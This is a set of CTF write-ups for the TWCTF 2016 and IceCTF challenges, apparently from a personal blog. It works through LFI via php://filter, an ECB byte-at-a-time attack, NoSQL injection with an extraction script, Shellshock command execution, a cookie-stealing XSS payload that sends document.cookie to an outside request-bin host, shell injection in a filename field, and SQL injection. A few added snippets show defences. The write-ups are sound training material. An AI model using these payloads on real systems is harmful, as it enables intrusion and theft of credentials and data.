TWCTF{Write_up} - Tokyo Westerns/MMA CTF 2nd 2016

2:45:00 PM Unknown 0 Comments




Glance - 50 pt
We are given a GIF file and told that the flag is inside (you found the challenging task here). First I tried to investigate it with the Stegsolve tool.
The GIF has 201 frames; let's extract them:

convert glance.gif flag.png

The picture is sliced into strips, and every strip holds a part of the flag. Let's merge the pieces to get the flag:


montage flag-*.png -tile x1 -shadow -geometry +1+1 myflag.png






Global page - 50 pt
At first sight, it looks like an LFI vulnerability:
curl http://globalpage.chal.ctf.westerns.tokyo/?page=index.php
<!doctype html>
<html>
<head>    

<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>
<br />
<b>Notice</b>:  Undefined index: HTTP_ACCEPT_LANGUAGE in <b>/var/www/globalpage/index.php</b> on line <b>36</b><br />
<p>
<br />
<b>Warning</b>:  include(indexphp/.php): failed to open stream: No such file or directory in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />
<br />
<b>Warning</b>:  include(): Failed opening 'indexphp/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />
</p>
</body>
</html>
Using PHP wrappers :D (php://filter is my bestie):
curl -H "accept-language:/filter/convert.base64-encode/resource=index" http://globalpage.chal.ctf.westerns.tokyo/?page=php:
Response from the server:
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>
<p>
</p>
</body>
</html>
Decode the script:
<?php
if (!defined('INCLUDED_INDEX')) {
define('INCLUDED_INDEX', true);
ini_set('display_errors', 1);
include "flag.php";
?>
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>
<?php
$dir = "";
if(isset($_GET['page'])) {
    $dir = str_replace(['.', '/'], '', $_GET['page']);
}

if(empty($dir)) {
?>
<ul>
    <li><a href="/?page=tokyo">Tokyo</a></li>
    <li><del>Westerns</del></li>
    <li><a href="/?page=ctf">CTF</a></li>
</ul>
<?php
}
else {
    foreach(explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $lang) {
        $l = trim(explode(";", $lang)[0]);
?>
<p<?=($l==='he')?" class=rtl":""?>>
<?php
        include "$dir/$l.php";
?>
</p>
<?php
    }
}
?>
</body>
</html>
<?php
}
?>
curl -H "accept-language:/filter/convert.base64-encode/resource=flag" http://globalpage.chal.ctf.westerns.tokyo/?page=php:
We receive the flag file, base64-encoded:
<html>
<head>

<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>

PD9waHAKJGZsYWcgPSAiVFdDVEZ7SV9mb3VuZF9zaW1wbGVfTEZJfSI7Cg==<br />

</body>
</html>
Now decode it with base64:
echo "PD9waHAKJGZsYWcgPSAiVFdDVEZ7SV9mb3VuZF9zaW1wbGVfTEZJfSI7Cg==" | base64 -d
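To make the bug in the decoded index.php concrete, here is an added Python model (not the challenge's code) of how the include path is built from the page parameter and the Accept-Language header, beside an allowlisting version; the allowed page names are taken from the menu in the PHP, and the language-tag pattern is an assumption.

```python
import re

# Assumption: the menu in index.php links only to these two directories.
ALLOWED_PAGES = {"tokyo", "ctf"}
# Assumption: a language tag is letters and an optional region, nothing else.
LANG_RE = re.compile(r"^[a-z]{2,3}(-[A-Za-z]{2,8})?$")

def include_path_original(page, accept_language):
    """Mirror of the page's PHP: strip '.' and '/' from ?page=, split
    Accept-Language on ',' and ';', and build "$dir/$l.php" for each token.
    Only the two characters are removed, so the 'php:' scheme survives and
    the rest of the wrapper URL arrives through the header."""
    d = page.replace(".", "").replace("/", "")
    paths = []
    for lang in accept_language.split(","):
        l = lang.split(";")[0].strip()
        paths.append(f"{d}/{l}.php")
    return paths

def include_path_hardened(page, accept_language):
    """Allowlist both inputs instead of stripping characters; return None
    (i.e. include nothing) as soon as either one is off the list."""
    if page not in ALLOWED_PAGES:
        return None
    paths = []
    for lang in accept_language.split(","):
        l = lang.split(";")[0].strip()
        if not LANG_RE.fullmatch(l):
            return None
        paths.append(f"{page}/{l}.php")
    return paths

if __name__ == "__main__":
    print(include_path_original("php:", "/filter/convert.base64-encode/resource=index"))
    print(include_path_hardened("php:", "/filter/convert.base64-encode/resource=index"))
```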



IceCTF{l33tcrypt_Cryptography_90_pt}

6:01:00 PM Unknown 0 Comments



Problem:
We were able to get some code; it seems to be encrypting using the AES cipher.
Here you can get the server file, and it's running at nc l33tcrypt.vuln.icec.tf 6001

Hint :
l33tcrypt is a new and fresh encryption service. For added security it pads all information with the flag! Can you get it?


Answer :

Overview :

The server takes our data, appends a secret message, encrypts the result and sends it back to us. Our goal is to recover the secret message. The server encrypts in blocks of 16 bytes. Each time we shrink our input by one byte, so that one more byte of the secret slides into a block whose other bytes we control, and then we guess the character that makes the server return the same block.

Details :

Your input must start with "l33tserver please" and must be base64-encoded.
The server then decodes the input data and appends the secret data. It encrypts all of that data and sends it back (as a base64 string) with a newline tacked on. I gleaned this from the following piece of code:

    def handle(self):

        .....

        data = recvline(req).strip()
        try:
            data = base64.b64decode(data)
        except:
            req.sendall("bad data\n")
            req.close()
            return
        if not data.startswith("l33tserver please"):
            req.sendall("You didnt say the magic word :(\n")
            req.close()
            return
        c = AESCipher(KEY).encrypt(pad(data, 16))
        req.sendall("Your l33tcrypted data:\n")
        req.sendall(base64.b64encode(c) + "\n")


If we look at the encryption algorithm on the server, you will notice they are using PyCrypto (Crypto.Cipher.AES). The PyCrypto documentation for AES says that the encryption works in blocks of 16 bytes, and if two plaintext blocks are identical they produce identical ciphertext blocks. This is the electronic codebook mode (ECB) of the AES cipher. You can read more about ECB and why it is insecure here. I hope to attack this cipher by manipulating it.

So we must make our input length a multiple of 16.
This is an example of input with an explanation:

Here are two blocks of 16 after the key words (the key words are 17 bytes, so they spill over into the second block):

len(input) == 48
         block 1 (16)   |block 2 (16)   |block 3 (16)   |
input : "l33tserver pleaseAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"XXXX
the flag (XXXX) starts right after our 48 bytes, at the beginning of block 4

After this block the server appends the flag and sends back the encrypted message.
The next step is resending the data with length - 1:


len(input) == 47
         block 1 (16)   |block 2 (16)   |block 3 (16)   |
input : "l33tserver pleaseAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX"XXX
the first byte of the flag (X) is now the last byte of block 3

Now we resend the input with length 48, changing the last character every time, until we find the same output block as with length 47.
This is the code that I used to find the flag.
You can download the code from here.
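The byte-at-a-time recovery described above, as an added example that is not the write-up's own script (which is only linked): it runs against a local stand-in for the server whose block function is a keyed SHA-256 truncated to 16 bytes instead of AES, which keeps the ECB property the attack relies on (equal plaintext blocks give equal ciphertext blocks); the key, the secret and the byte counts are constructed.

```python
import hashlib

BLOCK = 16
PREFIX = b"l33tserver please"       # 17 bytes, the magic words from the page
SECRET = b"IceCTF{constructed}"     # constructed stand-in for the real flag
KEY = b"constructed-key"            # constructed; the attacker never sees it

def pad(data: bytes, n: int = BLOCK) -> bytes:
    # PKCS#7-style padding, like the server's pad(data, 16)
    k = n - len(data) % n
    return data + bytes([k]) * k

def ecb_encrypt(pt: bytes) -> bytes:
    # Stand-in for AES-ECB (assumption): every block goes through a keyed
    # PRF on its own, so equal plaintext blocks give equal ciphertext blocks.
    return b"".join(hashlib.sha256(KEY + pt[i:i + BLOCK]).digest()[:BLOCK]
                    for i in range(0, len(pt), BLOCK))

def oracle(user_data: bytes) -> bytes:
    # Models the server: check the magic words, append the secret, pad, encrypt.
    if not user_data.startswith(PREFIX):
        raise ValueError("You didnt say the magic word :(")
    return ecb_encrypt(pad(user_data + SECRET))

def recover_secret(max_len: int = 64) -> bytes:
    known = b""
    while len(known) < max_len:
        # Pick a filler so that the next unknown secret byte is the last byte
        # of one block (the page does the same with 48 -> 47 byte inputs).
        fill = (BLOCK - 1) - (len(PREFIX) + len(known)) % BLOCK
        filler = PREFIX + b"A" * fill
        start = ((len(PREFIX) + fill + len(known)) // BLOCK) * BLOCK
        target = oracle(filler)[start:start + BLOCK]
        for c in range(256):
            # Same filler, then everything recovered so far, then one guess:
            # only the right guess reproduces the target ciphertext block.
            guess = filler + known + bytes([c])
            if oracle(guess)[start:start + BLOCK] == target:
                known += bytes([c])
                break
        else:
            break                    # no byte matches: we ran past the secret
        if known.endswith(b"}"):    # the flag format tells us when to stop
            break
    return known

if __name__ == "__main__":
    print(recover_secret())
```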



Flag : IceCTF{unleash_th3_Blocks_aNd_find_what_you_seek} :D


IceCTF{Write_up_Stage3_Stage4}

8:22:00 AM Unknown 0 Comments




Stage 3

Vape Nation Stego - 50 pt
Open up Stegsolve and step through the filters: the flag is hidden in the Green plane 0 filter.

Audio problems Forensics - 50 pt
Open up Sonic Visualiser and go to Layer -> Add Spectrogram.


R.I.P Transmission Forensics - 65 pt

Looking at the header of the file, it is an ELF binary.

But when we execute the ELF file with ./rip nothing interesting shows up, so I decided to dump its strings and investigate them:

strings rip > rip_strings && subl rip_strings

Something weird; maybe an embedded file is hidden inside. Let's extract it:

foremost -T rip
A password-protected zip file comes out. Let's crack it with fcrackzip:
fcrackzip -u -l 1-6 -c 'a1' 00002585.zip
The password is: bunny

Extract the zip file and bingo, the flag is there.

ChainedIn web - 75 pt
The first thing that grabbed my attention was in the footer bar of the home page.

We all know that MongoDB is a NoSQL backend, so the vulnerability is most likely a NoSQL injection. I have read some articles about this type of injection and how to exploit it, and there was a challenge on root-me with the same vuln. With Burp Suite we can see that the authentication request is sent in JSON format:



{"user":"admin","pass":"admin"}

and the response is:
{"message":"Invalid credential !"}
Let's try to bypass the authentication:
{"user":"admin","pass":{"$ne":"1"}}

We are authenticated as administrator!! So obviously it's NoSQL injection, good :D!
for more information visit this website http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html

Let's now try to guess the password:
{"user":{"$ne":"1"},"pass":{"$regex":"I.*$"}}

The server returns {"message":"Welcome back Administrator!"} with 200 OK. Let's try some other character:
{"user":{"$ne":"1"},"pass":{"$regex":"v.*$"}}
The server returns {"message":"Invalid Credentials"} with 500 Internal Server Error.
We know that the flag starts with IceCTF{, and the service returns 200 OK for a true check and 500 for a false one; this lets us guess the next character each time and recover the flag. I have written a Python script to retrieve it:


import requests

# Candidate characters, tried in this order for every position of the flag.
ascii_letters = 'IabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{-_}'

def url(password):
    # $regex makes the server answer 200 when the pattern matches the admin
    # password and 500 when it does not.
    r = requests.post('http://chainedin.vuln.icec.tf/login',
                      json={"user": {"$ne": "1"}, "pass": {"$regex": password}})
    return r.status_code

def comp(flag):
    # Returns the next character of the password, or '' when none matches.
    for i in ascii_letters:
        ch = flag + i + '.*$'
        if url(ch) == 200:
            return i
    return ''

if __name__ == "__main__":
    flag = "IceCTF{"
    for x in range(1, 60):
        nxt = comp(flag)
        if not nxt:
            break
        flag += nxt
        print(flag)
        if nxt == '}':
            break


The flag is : IceCTF{I_tou0gHT_Y0u_coulDNt_inJeCt_noSqL_tHanKs_monGo}
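An added example (not part of the write-up) from the defender's side: a check on the JSON login body that rejects the operator objects used above ({"$ne":...}, {"$regex":...}) before they reach the query, and, for logging, tells an injection attempt apart from a merely malformed request. The sample bodies are the ones on the page plus one constructed case.

```python
import json

def contains_operator(value) -> bool:
    # Recursively looks for MongoDB query operators ('$ne', '$regex', ...)
    # anywhere inside a decoded JSON value.
    if isinstance(value, dict):
        return any(k.startswith("$") or contains_operator(v)
                   for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False

def check_login_body(body: str) -> str:
    """Classify a JSON login body: 'ok' when user and pass are plain strings,
    'operator-injection' when a query operator is smuggled in (worth an alert),
    'malformed' for anything else. Only 'ok' bodies should reach the query."""
    try:
        doc = json.loads(body)
    except ValueError:
        return "malformed"
    if not isinstance(doc, dict) or set(doc) != {"user", "pass"}:
        return "malformed"
    if contains_operator(doc):
        return "operator-injection"
    if not all(isinstance(doc[k], str) for k in ("user", "pass")):
        return "malformed"
    return "ok"

# Constructed requests: the normal login and the payloads from the write-up,
# plus one body that is wrong-shaped without carrying an operator.
SAMPLES = [
    '{"user":"admin","pass":"admin"}',
    '{"user":"admin","pass":{"$ne":"1"}}',
    '{"user":{"$ne":"1"},"pass":{"$regex":"I.*$"}}',
    '{"user":"admin","pass":["admin"]}',
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(check_login_body(body), body)
```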

Geocities web - 100 pt
This task took me a while to solve! The service seems clean, nothing looks strange, and the website looks very old. So I tried to scan the target to identify anything, using dirsearch, Nikto and Vega, but nothing came out. Re-reading the challenge description for a hint, here we go: it may be a Shellshock vulnerability, because it says "It must be running some ancient technology and probably hasn't been updated in years". I found this article very useful to start the exploit.
Let's check the vuln:
curl -A "() { :; }; echo 'Content-type: text/html'; echo; /usr/bin/id;" http://geocities.vuln.icec.tf/

Bingo! It returns the uid and the gid, so the service is vulnerable to the Shellshock attack.
Now run bash on the host and ls the files:
() { :; }; echo 'Content-type: text/html'; echo; /bin/bash -c 'ls'

Let's read get_posts.pl by sending the command through the User-Agent header:

User-Agent:() { :; }; echo 'Content-type: text/html'; echo; /bin/bash -c 'cat get_posts.pl'

Obviously, the flag is hidden in the database. We need to fetch the table names from the DB: change the code, save it on your host and download it to the machine using wget.

#!/usr/bin/perl
use strict;
use DBI;
my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities",
    "geocities",
    { RaiseError => 1 },
) or die $DBI::errstr;
# list every table the geocities user can see
my @tables = $dbh->tables();
print "$_\n" for @tables;
$dbh->disconnect();
Now change the code to select from the 47a6fd2ca39d2b0d6eea1c30008dd889 table:

#!/usr/bin/perl
 
use strict;
use DBI;
 
my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities",
    "geocities",
    { RaiseError => 1 },
) or die $DBI::errstr;
 
my $sth = $dbh->prepare("SELECT * FROM 47a6fd2ca39d2b0d6eea1c30008dd889");
$sth->execute();
 
my $row;
while ($row = $sth->fetchrow_arrayref()) {
    print "@$row[1];@$row[2];@$row[3]\n";
}
 
$sth->finish();
$dbh->disconnect();

The flag is : IceCTF{7h3_g0s_WEr3_5UpeR_wE1Rd_mY_3ye5_HUr7}


Intercepted Conversations Pt. 1
Intercepted Conversations Pt. 2

Stage 4

ImgBlog web - 130 pt
After registering and logging in, we check the comment field: it's vulnerable to an XSS attack.


We need to get the admin session to log in as admin:
<img src=x onerror=this.src='http://requestb.in/xfkbrpxf?c='+document.cookie>

Now that we have the admin session, change the current session with a cookie manager and refresh the page:


session=eyJ1c2VyIjoxfQ.CpyE3w.eBmlIu3HEm7vpDtAlE63CbMIK5A

And here we go, we are in!
I tried for a while to upload pictures and inject the file name with a null byte, a double extension, and SQL injection in the comment, but nothing worked. I noticed that the service filters the "filename" field of our requests, removing dots and slashes, and then passes it to the Linux shell; I think it's PHP's shell_exec() function! So let's inject export $PATH to see how it reacts!

The global PATH of the Linux box is shown! So let's ls the files:


filename=" $HOME | ls "

We identified a flag.txt file:


filename=" $HOME | cat fl* "


IceCTF{Write_up_Stage1_Stage2}

5:15:00 PM Unknown 0 Comments


Stage 1


Spotlight [web - 10 pt]
After looking around for the flag, inspect the elements of the web page: the flag is in the console tab.
The Flag is: IceCTF{5tup1d_d3v5_w1th_th31r_l095}


All your Base are belong to us [Misc - 15 pt]
Convert the binary to ASCII.
The flag is : IceCTF{al1_my_bases_are_yours_and_all_y0ur_bases_are_mine}

Rotated! [Cryptography 20 pt]
The given text is VprPGS{jnvg_bar_cyhf_1_vf_3?}; decode the flag with the ROT13 algorithm.
The flag is: IceCTF{wait_one_plus_1_is_3?}

Substituted [Cryptography - 30 pt]
The title hints at the algorithm used to encode the text: "Substitution". Using CrypTool we can easily decode the text.
As you can see, after decoding, the text includes some errors and the flag is not correct.
Change the "P" letter to "w" and now the flag appears to be correct.


The flag is : IceCTF{always_listen_to_your_substitute_flags}

Time Traveler [Forensics - 45 pt]
After looking around on archive.org, go back to 1 JUN and the flag is there.

Scavenger Hunt [Misc - 50 pt]
I downloaded the icectf website from GitHub (you can find the GitHub link in the footer bar on the home page of icectf), then ran grep -nr "IceCTF{"

The flag is: IceCTF{Y0u_c4n7_533_ME_iM_h1Din9}

IRC 1 [Misc - 35 pt]

The task mentions that "There is someone sharing flags on our IRC", so we connect to the IRC server using irssi:
/connect glitch.is



Take a look at the channels available on the server: type /list and here we go, the flag is there!


The flag is : IceCTF{pL3AsE_D0n7_5h4re_fL495_JUsT_doNT}


Stage 2

Complacent [Reconnaissance - 40 pt]
There is no valid certificate on the website; open the certificate details and the flag is found there.
The flag is: IceCTF{this_1nformation_wasnt_h1dd3n_at_a11}


Search [Misc - 40 pt]
Googling for a while for DNS lookup, we found this website: http://mxtoolbox.com/SuperTool.aspx
The flag is: IceCTF{flag5_all_0v3r_the_Plac3}


Flag Storage [Web - 50 pt]
In the username field inject a simple SQL injection and you get the flag:


'or 1=1#



Kitty [web - 70 pt]
We retrieved the hash of the admin password from the task description:
c7e83c01ed3ef54812673569b2d79c4e1f6554ffeb27706e98c067de9ab12d1a 
Check the hash type using DuckDuckGo.

It's SHA2-256; through the md5hashing website we are able to crack the hash.

c7e83c01ed3ef54812673569b2d79c4e1f6554ffeb27706e98c067de9ab12d1a=Vo83*
Now try to log in to the admin session:
 
username:admin , password:Vo83*

